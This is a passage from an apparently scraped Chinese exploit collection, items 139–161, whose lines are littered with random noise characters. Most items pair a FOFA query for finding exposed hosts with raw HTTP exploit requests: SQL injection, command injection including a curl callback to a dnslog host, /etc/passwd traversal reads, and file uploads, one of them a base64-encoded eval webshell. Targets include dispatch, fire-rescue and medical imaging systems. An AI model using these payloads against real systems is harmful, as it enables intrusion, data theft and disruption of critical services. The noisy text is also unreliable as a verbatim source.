* u8 k7 x4 a7 a+ z0 E6 j( i% u# Y5 y7 i
( ~. J8 e" S& W0 f/ s7 s, u) D, F139. 福建科立讯通信指挥调度平台editemedia.php sql注入: e+ Q- W+ Y+ d8 M; \' t( ?, K: l5 I M
CVE-2024-2622
+ O* x/ s' S8 P# y% A* ^FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"9 S* K2 H$ i/ d; E( r
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
( B& d* u% E; c; d! yHost: x.x.x.x
) t- P1 z. r+ M* V7 D+ NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
. t" b% Z% C2 U; _$ H- A) v$ J6 NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 }8 J! G9 U4 u# k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 x8 w2 ^% J/ K
Accept-Encoding: gzip, deflate, br
& y' Q6 j# V& v& g- kConnection: close
$ T4 b; Q, Y% j' V! w g- }# z+ hCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk; w. @: N( Y# P
Upgrade-Insecure-Requests: 18 _9 C! c7 k M, \; l
, H. b5 P" e* Q
- p, F! r+ e4 ~, N$ ~3 {7 ~6 g140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入/ g+ F1 f1 e/ W' t
CVE-2024-2566
# F' y+ f2 P M" wFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"/ |) ~& B$ K& M! t* J
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
. `8 e/ r3 ]' [6 A/ s0 OHost: x.x.x.x% ~0 G/ V* |' ~" M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
9 S) V: |2 W( C: g4 N1 PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 K) N. Q5 h9 ]6 ~: @9 OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& `/ K' @5 I# b! K% H2 l3 q7 u8 LAccept-Encoding: gzip, deflate, br* Z9 ~ n/ `& g$ y' V0 ~! i+ E) a
Connection: close
$ H8 q7 T0 A' S2 ICookie: authcode=h8g9
" u/ |% I0 p5 f! C U5 OUpgrade-Insecure-Requests: 1
: X, z7 W, F) G7 O; `
8 k- o, P: A* t$ L* F5 J' ], N8 O+ A5 ~
% m2 r3 M! g9 F, I% H) k5 ~: o141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
7 e7 ]8 n5 M: L/ h4 QFOFA:body="指挥调度管理平台"
+ Y! U4 R2 w& ]POST /app/ext/ajax_users.php HTTP/1.11 `3 w" G* w; U* Y. g" z3 N3 c! a
Host: your-ip
5 q m2 [- y0 q; EUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
. {% v3 Z0 n1 B0 s: {8 hContent-Type: application/x-www-form-urlencoded
3 }/ `# P8 `3 i; T) w9 Q. G5 q! G7 ]3 @; k6 Y3 l" j
" l9 x$ ]8 W$ ^5 |( s
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
$ r: J) z* o* A- {* b# r: ?
' } C- K6 F9 n6 E( e' F& b0 |" {- r: n, M ^$ l% K
142. CMSV6车辆监控平台系统中存在弱密码
1 e: g1 A: s* a: ]CVE-2024-29666
1 U" _& X. ~. hFOFA:body="/808gps/"
) S+ g$ W* i! _0 i6 x4 W% uadmin/admin
8 D0 H# [% k5 [143. Netis WF2780 v2.1.40144 远程命令执行
. q R. N; L, ~& zCVE-2024-25850
# K- |# A; M/ B# @7 R7 tFOFA:title='AP setup' && header='netis'7 S( j' G+ T3 K; m# [- `
PAYLOAD o, R6 D% w! K+ R6 {* y2 A" f
& @% y9 O( G/ n- `1 U* I
144. D-Link nas_sharing.cgi 命令注入6 l8 V5 M# N& z5 u: [" b
FOFA:app="D_Link-DNS-ShareCenter"
- H' s* ]# B, p( X) i- r0 Bsystem参数用于传要执行的命令
: `$ b! Y: c" x% CGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
* L; H# ^3 F+ J2 Y1 y6 hHost: x.x.x.x
3 i( o% S9 h |/ q2 _7 q/ rUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0% U4 f0 R3 p: s ?6 y
Connection: close! d+ F- c! I, p. t; {% [
Accept: */*
x! S) @. K gAccept-Language: en' b& t, f( j) ^+ M. V2 i6 b
Accept-Encoding: gzip V R5 }" {: M) y5 h) B/ g
) t$ |/ G9 ]6 N F
7 j" {6 E; Y- N) Z* V4 n
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入# `) I! c+ h* A5 t" }& P+ d% E
CVE-2024-34000 b- `$ v. p, w/ T: G
FOFA:icon_hash="-631559155"
$ }0 [' j0 K# D7 s6 hGET /global-protect/login.esp HTTP/1.1
9 g/ L! c1 p h* G- J& `Host: 192.168.30.112:1005
6 R" v' W7 j( Y) Y" g5 g9 F/ t* wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84' P& I7 l" {( `, m8 I
Connection: close
8 }9 C! {4 W4 m' T' B: P* \Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
; ^& g; m! D1 w* |7 v" Q7 pAccept-Encoding: gzip3 I) c2 B/ K# U0 R% H# N
- W; W" j' F% l- q# ]! M, U7 y Q+ e6 m$ A& b1 j
146. MajorDoMo thumb.php 未授权远程代码执行. d# C3 B1 B8 z# _
CNVD-2024-02175% V* b9 K# M4 X3 l. ^
FOFA:app="MajordomoSL"
' I* \/ c5 x4 Y; ]) XGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
, \ m* \& v6 m" M; t' rHost: x.x.x.x# ^. r. l8 N! j4 [( b; N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84) w) A& x1 R" i- c5 q" p5 |* L
Accept-Charset: utf-8* Y5 I7 D) n6 F/ I$ W" P. A
Accept-Encoding: gzip, deflate" y8 i6 E! L0 C8 M" N* @/ y3 M
Connection: close
3 p: l) M+ z' ~% _! ~- ] E: _. Z( e9 s" I& u' h$ w
6 M) o4 \& o/ W147. RaidenMAILD邮件服务器v.4.9.4-路径遍历, R# o- b' q( i
CVE-2024-32399( |5 m! ?, L7 l8 C. m& `3 N; a
FOFA:body="RaidenMAILD"
$ @' m! d* Y- e6 ` H, e! Z* aGET /webeditor/../../../windows/win.ini HTTP/1.1
s+ x& i" F/ W* P. S: THost: 127.0.0.1:81
Q& h" f }. h' W1 B/ zCache-Control: max-age=0
& \, f3 H8 h1 O1 U# v* I; eConnection: close
) u1 U6 p5 r" R1 ?3 K
, G$ n1 ^. S5 [+ j, z f" L5 b
' _* G/ l% U+ M0 @+ c5 x148. CrushFTP 认证绕过模板注入
3 V6 E5 ~. z% `2 PCVE-2024-40409 @8 p# h5 c/ v2 J: u$ w" U$ X
FOFA:body="CrushFTP"
! j. S A: S) P1 o8 E1 JPAYLOAD7 n3 B7 ]8 x5 m5 g8 j
5 {$ |& ~, x0 N' ]
149. AJ-Report开源数据大屏存在远程命令执行
/ F4 m% [: {% H+ E- F& pFOFA:title="AJ-Report"
" Q/ N1 H" Z+ L0 t7 K: \
0 H" r5 v. m2 ?! e+ O; U: N* QPOST /dataSetParam/verification;swagger-ui/ HTTP/1.19 K ^8 ]- X# m& i2 d6 P- A1 R
Host: x.x.x.x( b6 Q" I4 X: p( f% k/ z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36# x4 W2 o- B* E' u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( y/ c& r! E, e7 B# E, _/ D3 T/ \Accept-Encoding: gzip, deflate, br8 O4 S; v: J( w1 Y/ g
Accept-Language: zh-CN,zh;q=0.9
5 N% L$ @6 b; \8 t+ z# X$ pContent-Type: application/json;charset=UTF-8
1 t- ]% v; W9 H' \Connection: close
& R, M4 G$ v7 W
- W% q1 j$ |4 Q: o- h6 v8 m{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
, d- @- z4 Y5 b# Q' Q T- z6 F, i" x0 J% z* x- U$ E0 K g
150. AJ-Report 1.4.0 认证绕过与远程代码执行- p' `, y1 b# I# h' u4 c/ s
FOFA:title="AJ-Report"
: ]: O7 o( S) q9 W0 l6 g" tPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1+ n5 O! J8 i5 `4 A" k3 M7 v
Host: x.x.x.x. \0 C- c) L; I: ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
! b! w9 {* a, R$ K- ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 c0 j& o/ R% m' k0 C& U* S. N1 `
Accept-Encoding: gzip, deflate, br
4 m- b) P0 {9 oAccept-Language: zh-CN,zh;q=0.9* S5 b) w9 w1 e7 `/ u' J
Content-Type: application/json;charset=UTF-8
8 t$ b9 ^+ T% `1 k8 u& b, u" BConnection: close7 |/ X7 @9 p( o+ i4 A
Content-Length: 3393 V* h* \2 M) a' C& i
; [4 @3 u5 M1 L+ ]
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
. G( Z+ ^% U4 k% O( {: a; W( P7 d0 {/ a) W$ ?* ?0 [0 n. M+ M7 [
$ r- J+ D: v. e$ ?
151. AJ-Report 1.4.1 pageList sql注入- `! C' k3 u0 P3 |, e' n
FOFA:title="AJ-Report"
+ ^( k' F' p* Q+ l- tGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.12 Y2 m+ h% T8 {: e+ c
Host: x.x.x.x
, T$ q+ r; w. w; c8 iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! i# ?! r0 K Q4 \! j& ~. \5 `0 T
Connection: close* f4 @ q3 z0 g/ S4 n) I% ^- m
Accept-Encoding: gzip
- @2 {$ C/ A: S2 Q$ j3 y: y
6 T o K, ^1 U. s0 z
2 O: r" v& j& ]152. Progress Kemp LoadMaster 远程命令执行
: ~# Z. s/ N6 c+ t1 SCVE-2024-1212
* K; Y, c0 g7 N% CLoadMaster <= 7.2.59.2 (GA)
9 K8 J. f/ F/ t( ?% q+ Y6 c: E* nLoadMaster<=7.2.54.8 (LTSF)) ]7 U( ~% G y @+ R% d
LoadMaster <= 7.2.48.10 (LTS)- g: g& ~) c% \4 @
FOFA:body="LoadMaster"4 E$ E6 p% q1 U- X/ ~3 t9 z
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码' O9 @7 Z+ E7 {7 Y* v
GET /access/set?param=enableapi&value=1 HTTP/1.15 k8 h1 N* D5 r* a: _# i& V; X
Host: x.x.x.x! r: d5 X& D4 ?$ N* y$ C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
/ Y7 r' D5 k) d0 w8 `6 K- x+ xConnection: close4 } U; K1 b( P7 O6 K
Accept: */*! ^0 Z+ `2 _3 K# l# O B
Accept-Language: en
# `/ y2 x6 W7 A* e2 ^$ }+ SAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=) m) L1 k; U3 Z8 {) a. F! v. o: l2 u
Accept-Encoding: gzip/ j( |" t# V! N+ Y! B) M0 H
+ ]0 F' l/ M+ W, K l5 X
. E6 y7 h7 N+ f9 P; X
153. gradio任意文件读取
! B: U( ?: M; ]3 bCVE-2024-1561FOFA:body="__gradio_mode__"
/ n8 C0 D$ l* l第一步,请求/config文件获取componets的id
# K1 J# i& i7 y2 a8 F) | r! q8 Whttp://x.x.x.x/config
' A" l" K4 A% X4 a, e; A0 v* ?4 C9 |$ k# x( d- @
6 N* l% K6 j. G9 W2 V) k9 n第二步,将/etc/passwd的内容写入到一个临时文件/ y- S8 g) ]. k* d! P3 v: R
POST /component_server HTTP/1.1
, t G# Q& v2 w$ L0 QHost: x.x.x.x
& m( A# [) ]8 S; a2 t+ KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
2 p# E+ }: E& a6 |1 \, k) KConnection: close
5 L% ?+ p7 ?9 `# D5 G, h) [5 p: l+ fContent-Length: 115; q% J& ^! Q6 }7 C
Content-Type: application/json' E4 R5 T' C: t$ @
Accept-Encoding: gzip8 A0 r: l4 ^$ t
7 P7 I/ R) ?4 Y' C" }6 `7 P{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
+ M' k1 j9 v- r) g1 e! \* y6 B
5 r9 }6 U, h) |$ K. D! {5 G5 P- g0 d$ ]* ]: k2 ], ~
第三步访问- A/ i- \+ V% B4 { r
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd7 [( a/ T. t' ?9 i" ~0 V* i& r
' y) M8 t T5 n$ ?/ e
1 |$ X- \9 ]4 {& \" c* U$ w, f/ A154. 天维尔消防救援作战调度平台 SQL注入
+ r7 M; t! E: E: s, vCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"" k8 C) m" K4 e& h! ~
POST /twms-service-mfs/mfsNotice/page HTTP/1.1! O# g' Z; l5 h" R6 R
Host: x.x.x.x
2 D8 A& p( y% ~7 e1 o% v4 `( J3 Z) YContent-Length: 106
0 n: A# y( D1 yCache-Control: max-age=0, N, R/ V. R+ K7 o4 F5 W, R5 E. G
Upgrade-Insecure-Requests: 1
8 U2 R" Q9 W7 }. r1 LOrigin: http://x.x.x.x
' y7 s0 ]4 l9 |( E: xContent-Type: application/json* {8 j3 V# v# H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.367 P8 x, h+ {. m! Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& Y! i2 R) R8 R6 f
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
: I: |: G& ^3 ~& l1 NAccept-Encoding: gzip, deflate8 H% F: K9 b( w! E" N
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7! g1 }- s* K6 J: I2 a/ n
Connection: close& I# S* W! U# k |. R
( J' D. M% G" |! q @. \{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}4 D6 [ Z4 k' [% {$ W
! F; e. S V. Q& Y) |2 R( g. b
3 l% r% k; ~) a3 Z7 _. e* A155. 六零导航页 file.php 任意文件上传: t- f2 J, ?2 F, o/ ]9 u
CVE-2024-349822 T! V& C% U+ ^3 ^: y- R* K
FOFA:title=="上网导航 - LyLme Spage"7 F$ X0 l% F9 w1 O' k. [3 H
POST /include/file.php HTTP/1.1
" v2 Z: f- _. H& g1 LHost: x.x.x.x% t) X6 E' R, p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.01 J9 @. A$ y" m, C
Connection: close
' v, O% g+ P7 s% f4 k: { X( Z' S% AContent-Length: 232 c# a& z) {, Z, b
Accept: application/json, text/javascript, */*; q=0.01
r* C. U; q5 h2 eAccept-Encoding: gzip, deflate, br. K% n) V9 ^# }* g& {2 v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 c5 M; _( Y7 G3 t& u/ o6 O' ?/ uContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
6 Q, ? ?. n2 o t: _% y3 SX-Requested-With: XMLHttpRequest
! o m/ F' ]) s/ Q: v+ g+ }% c/ y0 O: `- U" V; v2 j
-----------------------------qttl7vemrsold314zg0f K% d- B" P, X5 s$ B2 m
Content-Disposition: form-data; name="file"; filename="test.php"% O O% I3 [) j- q& d; E' [) X
Content-Type: image/png2 |4 o7 i7 L! K* o- Y" f
% L4 c; L% C# ]6 K& y
<?php phpinfo();unlink(__FILE__);?>( _1 y* M# _" `5 s% c5 o" e0 P
-----------------------------qttl7vemrsold314zg0f--
$ Q( S$ u) }* S' q, _. D
) d) l0 V& Y. M9 m0 `
$ u/ D. l5 _* I3 H" v$ `) W& R访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
" s& C# e( s# H! B/ h" s4 K6 j1 r: z0 ~* {7 |) c) J7 t
156. TBK DVR-4104/DVR-4216 操作系统命令注入
0 |2 L5 S8 p$ l* n8 lCVE-2024-3721' L, X$ h6 d- i
FOFA:"Location: /login.rsp"5 Z s+ E0 x+ f3 t7 D) I
·TBK DVR-4104
% c: K) @' N8 q, I4 Z5 J·TBK DVR-4216
% E A- B( r+ F8 b6 ?curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"& m- S; M. J$ l! @
$ Q! r& {8 s8 Z' |
+ R L6 O5 f) ^0 a$ b4 l! FPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
) g; N9 ]* {, q) M: q fHost: x.x.x.x3 _, B& L A. } f, w+ q& }
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 g1 V8 v! o0 e
Connection: close
/ i# Z. z9 d; \, jContent-Length: 02 H; K N9 z7 c
Cookie: uid=1+ V% v+ M9 c m
Accept-Encoding: gzip \1 D$ S' e5 l- n$ p
Q9 j' D+ i. L {/ o
4 L+ D" Z. x: q! M2 q: V6 \* U/ ~157. 美特CRM upload.jsp 任意文件上传
9 O. }/ H+ I2 d* g' N/ g/ YCNVD-2023-06971. s) y+ D" n! W" j% J; Q) h3 F
FOFA:body="/common/scripts/basic.js": [3 r( |1 i" Q/ q9 k9 e$ `
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1: X. M% y, }6 N
Host: x.x.x.x
" l3 L- r( B8 I6 S4 A& PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
( f# d: P2 F) _% O% s" `4 q# j% h( zContent-Length: 709
4 Y* N# V9 r3 }! s& v" R1 NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: { j: m) G! E* X: zAccept-Encoding: gzip, deflate: b5 d* U% M: D- Z
Accept-Language: zh-CN,zh;q=0.9
d7 F6 L9 L) V1 j3 n6 ICache-Control: max-age=0
5 V7 `; W& [7 n# s! WConnection: close
6 z! T0 M' i9 @) d/ K) ^8 Q7 b6 P" XContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN: T6 t4 J2 ^3 y+ r
Upgrade-Insecure-Requests: 1
- E* ?9 A9 l$ q4 Y' y! I! ]5 g
" P* N w5 g; E& A8 s6 P- t# H) a------WebKitFormBoundary1imovELzPsfzp5dN
" j% O+ `+ J: H6 hContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"; X8 G7 f' ?- _, V( D) r
Content-Type: application/octet-stream$ H/ o7 i0 M/ U8 O+ O6 ?
; c. b4 K& u1 ]7 G- X ^
nyhelxrutzwhrsvsrafb
# K! E, j! l/ Q5 ]------WebKitFormBoundary1imovELzPsfzp5dN
3 F( d' B$ b8 N) u: ZContent-Disposition: form-data; name="key") R/ u% E1 D1 }% B6 \6 ?8 A/ n
0 K5 ?. m+ _7 ^2 h2 E2 U& ~$ E
null N9 c' B& s J' G
------WebKitFormBoundary1imovELzPsfzp5dN
( V0 G' E5 x9 x, I2 t- {/ KContent-Disposition: form-data; name="form"" Z2 P. ] w! ?- B3 s1 p) X
9 i f* k1 S( d5 M+ p1 A
null& R' Q) z! o6 i. j* X
------WebKitFormBoundary1imovELzPsfzp5dN
. q1 Y' f' m3 y/ {Content-Disposition: form-data; name="field"
, d( b$ s) M/ a5 J/ T" ^7 u0 X9 @3 [( ?4 V5 G% ^
null
$ O+ Q0 e- I5 J, g% \; b) s, V+ x/ J( W------WebKitFormBoundary1imovELzPsfzp5dN+ W1 i# a4 K1 n( p9 T
Content-Disposition: form-data; name="filetitile"+ ?. d0 b6 Z- D, Z6 k) l( C
6 c- u, s9 m5 F6 E$ k; y2 H# f' p4 Gnull
3 }: n1 _ X1 B* f------WebKitFormBoundary1imovELzPsfzp5dN! N, O* P$ u& X% v6 y
Content-Disposition: form-data; name="filefolder": e" X/ |6 B- E( ^6 j* }
! r2 U2 h" K/ a* i% E& qnull/ U$ V1 c! L1 _& K
------WebKitFormBoundary1imovELzPsfzp5dN--
- c f) Z% r# c8 V+ k; N6 K5 W( k# q
% m5 j. r6 }$ z+ }4 s
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
# v- x2 R8 u1 c% F, b2 }$ v' J
* y3 F- V# r! y. f1 P6 P2 Q158. Mura-CMS-processAsyncObject存在SQL注入
9 e: N; ?; q& {) |9 c: uCVE-2024-32640
: I8 L3 d* t5 D/ n y% d: ]FOFA:"Generator: Masa CMS"7 q+ Q+ }/ x, k6 K$ v
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
7 D& y5 y4 o) m- ~: SHost: {{Hostname}}
5 T0 Q7 ^ L4 x1 ~. k8 NContent-Type: application/x-www-form-urlencoded: L( M2 P2 y) q$ j" m
/ ?" c# x. v7 O6 D1 ?8 R3 Z2 s4 [object=displayregion&contenthistid=x\'&previewid=1# e/ K7 p# y" m1 z1 P
/ ~2 U& g. Q8 i+ i; _8 U) e; d1 A7 C5 z) S
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
9 t$ M$ H( z4 ]3 L, N8 F7 FFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")2 Y) t: u9 G- V: [' [: [7 j
POST /webservices/WebJobUpload.asmx HTTP/1.1! N5 _ v' p5 \: R0 A' I- l
Host: x.x.x.x
9 k+ `$ b9 q3 ^: F `7 f9 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36- _* ]: j& R& _/ X# i" V: r' y d6 P
Content-Length: 1080
3 S0 w" f& d! j, r1 d$ r0 o8 K/ U" @& aAccept-Encoding: gzip, deflate
% a& z- s% V! X* V+ D- Y2 i6 DConnection: close
. Y5 {; G. E F$ ]# |5 d: vContent-Type: text/xml; charset=utf-8* A# c+ ?. q$ I( G8 J
Soapaction: "http://rainier/jobUpload"0 A! [+ ]" }$ a- E9 C; n" v8 i# i) q
, x% ?/ n6 Y2 R$ |3 T6 P+ h% m<?xml version="1.0" encoding="utf-8"?>
' ]. J9 [7 I1 F4 S<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
' [ E1 O, Q% C4 S- U: c<soap:Body>, M! A+ G9 E: d& l6 @
<jobUpload xmlns="http://rainier">$ f- N# O# w! C; ^, U9 c
<vcode>1</vcode>
; }: [) s4 ~: @( V4 y$ D$ t% j% `<subFolder></subFolder>
( y/ c( a& k5 {<fileName>abcrce.asmx</fileName>, _( v$ Q! b: b+ k
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>8 H0 ~% I8 D- X Q1 H# X% M! v$ A
</jobUpload>; R0 Z5 `# _4 p' ?2 R" H! {7 f
</soap:Body>$ A" g# Q4 U. H; [8 C5 b
</soap:Envelope>" K: g1 s q# G7 Z
3 L' ~8 F0 ?. R6 B1 j4 a* b; C$ x5 `* }# g
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")5 U$ z0 }3 { }$ _6 m, P
8 G$ Z6 d7 k! E; }4 c% {/ ~2 f( ]
160. Sonatype Nexus Repository 3目录遍历与文件读取
* b }/ F5 c! C/ JCVE-2024-49564 ?& L( Y8 A) H/ i5 O$ H3 N
FOFA:title="Nexus Repository Manager"
" u5 I* D6 h5 {6 P, E+ IGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
3 K6 O4 B t5 D; y/ k9 I. sHost: x.x.x.x( e% E. j1 V1 C2 l. ]$ j) A9 W
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
, \0 L, _& R4 H/ w- FConnection: close
5 Y; I! L; U, t* w, s" L( QAccept: */*/ o5 b- y) s# K: R- Q
Accept-Language: en
$ f6 ]/ U" p& h0 Q9 v2 uAccept-Encoding: gzip; a( ^. u1 ]3 v6 N! ~* [
0 x! G( p' p, @0 E, f
4 i+ Y, K1 }' j" p1 v; G
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传$ Z) @) _# X) n# x5 m- o, O: T j
FOFA:body="/KT_Css/qd_defaul.css"
' Z* j$ e# S- S6 I3 f第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
4 K/ Q9 p8 k$ [ F- m& F5 J9 n ^2 gPOST /Webservice.asmx HTTP/1.1
% f# X: R5 `7 WHost: x.x.x.x% I" V) u1 J n$ S2 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36: ]7 P5 A: K7 w6 {; Q* x
Connection: close" \' W% J+ T9 O4 [ ^ {% n6 E" C
Content-Length: 445
) m+ W+ O1 |1 q9 m' v) t2 ZContent-Type: text/xml
8 E+ I; ]* s+ E) y. O/ VAccept-Encoding: gzip2 ?3 r9 Q4 w/ Q) `* z2 S
